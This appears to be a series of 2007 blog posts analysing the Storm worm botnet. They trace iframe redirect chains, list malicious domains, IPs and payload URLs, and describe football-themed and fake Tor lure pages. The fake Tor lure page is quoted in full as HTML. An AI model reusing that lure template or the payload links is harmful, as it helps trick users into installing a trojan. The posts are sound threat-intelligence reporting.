the sid=1 sid=2 and sid=3 pages are all fake error pages with more iframes:

http:// bl0cker.info /mail/cn.php
http:// lem0n.info /xxx/iframe.php
http:// lem0n.info /xxx/m/iframe.php
http:// bl0cker.org /xxx/iframe.php
http:// space-sms.info /xxx/iframe.php
http:// bl0cker.info /bn/index.php

sid=4 is a javascript encoded page that trys to download http:// bl0cker.info /bn/exe.php

So how deep can it get? I followed the white rabbit through a few more links:

cn.php is an iframe that points to http:// eliteproject.cn /ts/in.cgi?alex

lem0n.info /xxx/iframe.php is a javascript that points to http:// bl0cker.info /bn/index.php

lem0n.info /xxx /m/iframe.php: is a lot of errors:

Warning: fopen(redir.txt) [function.fopen]: failed to open stream:
Permission denied in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 40

Warning: flock() expects parameter 1 to be resource, boolean
given in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 41

Warning: ftruncate(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 42

Warning: fwrite(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 43

Same errors in http://bl0cker.org /xxx/iframe.php and http:// space-sms.info /xxx/iframe.php.

eliteproject.cn /ts/ in.cgi?alex is an mpack that points to http:// superengine.cn /1278/file.php (binary file)

In summary, possible new Storm domains:

superengine.cn
eliteproject.cn
space-sms.info
lem0n.info
bl0cker.org
bl0cker.info

None of these are fastflux --yet.

Space-sms, lem0n.info, bl0cker.org and bl0cker.info all use the same name servers, ns1 and ns2.spektor.ws.

NS2 points to the same IP (58.65.239.66) as the A records for the new domains.

Stormworm Tactics Change to Football Fungus

Some recent changes involving storm:

Starting about 13:50 GMT Randy V noticed the domains started rotating the IP's less frequently. Looking back at my logs I came up with this:

2007-09-08 13:49 (GMT): 12.216.204.171
2007-09-08 13:49 (GMT) - 2007-09-08 13:57 (GMT): 208.115.203.105
2007-09-08 13:58 (GMT) - 2007-09-08 14:03 (GMT): 76.226.146.196
2007-09-08 14:04 (GMT) - 2007-09-08 14:20 (GMT): 72.40.18.87
2007-09-08 14:21 (GMT) - 2007-09-08 14:30 (GMT): 209.30.158.167
2007-09-08 14:31 (GMT) - 2007-09-08 14:49 (GMT): 70.129.33.116
2007-09-08 14:50 (GMT) - 2007-09-08 15:15 (GMT): 74.73.209.16
2007-09-08 15:17 (GMT) - 2007-09-08 15:26 (GMT): 121.114.132.128
2007-09-08 15:26 (GMT) - 2007-09-08 15:34 (GMT): 75.132.218.100
2007-09-08 15:35 (GMT) - 2007-09-08 15:43 (GMT): 75.66.243.62
2007-09-08 15:44 (GMT) - NOW: 127.0.0.1

From 15:44 to ~17:00 the index page showed:

Welcome to nginx!

Now the index page is NFL related (and nicely done) which is sharing NFLTracker.exe (NFLTracker.exe - Infected: Trojan.Peed.III). Its not using any of the xor'd javascript or browser exploits. This page is strictly social engineering.

(DISOG Screen Capture: Sept 8, 2007)

Our guess is the domains will be changing soon, with football related names - or that there will be mass infection of football related sites with frames pointing to the peer pages.



UPDATE: Binary is now called 'tracker.exe'

CME711 (Storm) using TOR rouse

This morning I woke up to the latest storm page...

<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">
<html>
<head>
<title>Tor: anonymity online</title>
</head>
<body>
<table border=0 width=\"500\">
<tr><td><img src=\"img/tor1.gif\"></td><td><h2>Tor: anonymity online</h2></td></tr>
<tr><td colspan=\"2\">
<br>
Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, IRC, SSH, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.
<br><br>
Tor aims to defend against traffic analysis, a form of network surveillance that threatens personal anonymity and privacy, confidential business activities and relationships, and state security. Communications are bounced around a distributed network of servers called onion routers, protecting you from websites that build profiles of your interests, local eavesdroppers that read your data or learn what sites you visit, and even the onion routers themselves.<br><br>
<a href=\"tor.exe\"><img src=\"img/tor2.png\" border=0></a>
</td></tr>
</table>
</body>
</html>

The text is a word for word cut and paste from the official TOR website, tor.eff.org.

In summary, they're wagering more clicks by offering The Onion Router (TOR) Proxy. Of course the binary is the standard CME711 trojan, nothing so fancy. At least they could have included TOR in the download!

The files file.php, sony.exe and tor.exe are resolving while video.exe, setup.exe and labor.exe no longer resolve.

UPDATE: TrendMicro has a nice writeup on this too: http://blog.trendmicro.com/nuwar-poses-as-tor-proxy/